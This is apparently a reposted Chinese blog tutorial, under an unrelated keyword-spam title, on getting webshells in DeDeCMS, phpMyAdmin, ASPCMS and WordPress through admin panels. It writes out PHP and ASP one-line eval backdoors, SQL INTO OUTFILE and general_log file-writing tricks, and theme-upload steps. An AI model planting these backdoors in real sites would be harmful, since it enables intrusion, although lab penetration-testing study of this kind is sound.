您的位置:首页 > 房产 > 建筑 > 上海市建设信息网官网_百度搜索seo怎么做_今天发生的新闻_seo优化方法

上海市建设信息网官网_百度搜索seo怎么做_今天发生的新闻_seo优化方法

2025/1/6 5:27:01 来源:https://blog.csdn.net/yiqiqukanrichu/article/details/144814555  浏览:    关键词:上海市建设信息网官网_百度搜索seo怎么做_今天发生的新闻_seo优化方法
上海市建设信息网官网_百度搜索seo怎么做_今天发生的新闻_seo优化方法

DeDeCMS

环境搭建

傻瓜式安装

漏洞一:通过文件管理器上传WebShel
步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过⽂件管理器上传php文件获取webshell

登陆网站后台

步骤二:登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传

步骤三:访问上传成功后的文件
http://127.0.0.1/dedecms/uploads/1.php

漏洞二:修改模板文件拿WebShell
步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】

进入后添加恶意代码

步骤二:点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化

步骤三:访问主页,phpinfo更新成功

漏洞三:后台任意命令执行拿WebShell
步骤一:点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】

步骤二:点击【代码】--》在图中显示的路径与站点进行拼接

http://127.0.0.1/dedecms/plus/ad_js.php?aid=1

步骤三:使用蚁剑测试连接

漏洞四:通过后台sql命令执行拿webshell
步骤一:访问系统---sql命令行工具---执行 select @@basedir,获取mysql路径,由此瑞测网站绝对路径

猜测绝对路径为E:/phpStudy/PHPTutorial/

步骤二:into outfile写入一句话木马

步骤三:使用蚁剑测试连接

PhPMyadmin

一.通过日志文件

1.sql语句模式

show global variables like '%general%';	  //查询日志文件
set global general_log='on'; //日志保存状态开启;
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'; //修改日志的保存位置。
select '<?php eval($_POST[cmd]);?>';

在去查看一下确保开启

修改存储路径

Ok修改成功

写入木马;去连接日志文件

2.图形化界面

新建-->变量-->过滤

点击编辑改成ON

然后再去sql语句那写入

二.导入导出

select @@datadir   //判断路径
猜测web路径
select "<?php @eval($_POST[cmd]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/333.php';

写入后我们去连接

ASPCMS

访问后台文件并登录

点击到幻灯片设置里点击保存,然后抓包

将数据包中的slideTextStatus 字段的值修改为我们的一句话木马

1%25><%25Eval(Request (chr(65)))%25><%25

写到了/config/AspCms_Config.asp 这个文件里

点击放行

我们访问 aspcms_config.asp 文件

访问成功使用菜刀连接

获得 shell

Wordperss

注册账号

登录

漏洞一:后台修改模板拿WebShell

步骤一:思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell;登陆WP后点击 【Appearance】 -->author-bio.php

步骤二:在其模板中插入一句话木马代码..点击 【Update File】 按钮
<?php @eval($_POST[123]);?>

步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php

步骤四:尝试蚁剑连接获取webshell

漏洞二:上传主题拿WebShell
步骤⼀:接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件

先去下载一个免费模板

https://blog.csdn.net/m0_59768231/article/details/144777066?spm=1001.2014.3001.5502

解压后打开第一个文件夹写入一句话木马

重新压缩为一个.zip压缩包

步骤二:找到网站上传模板主题的位置

选中我们刚才重新压缩好的文件

步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php

步骤四:尝试蚁剑连接获取webshell

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com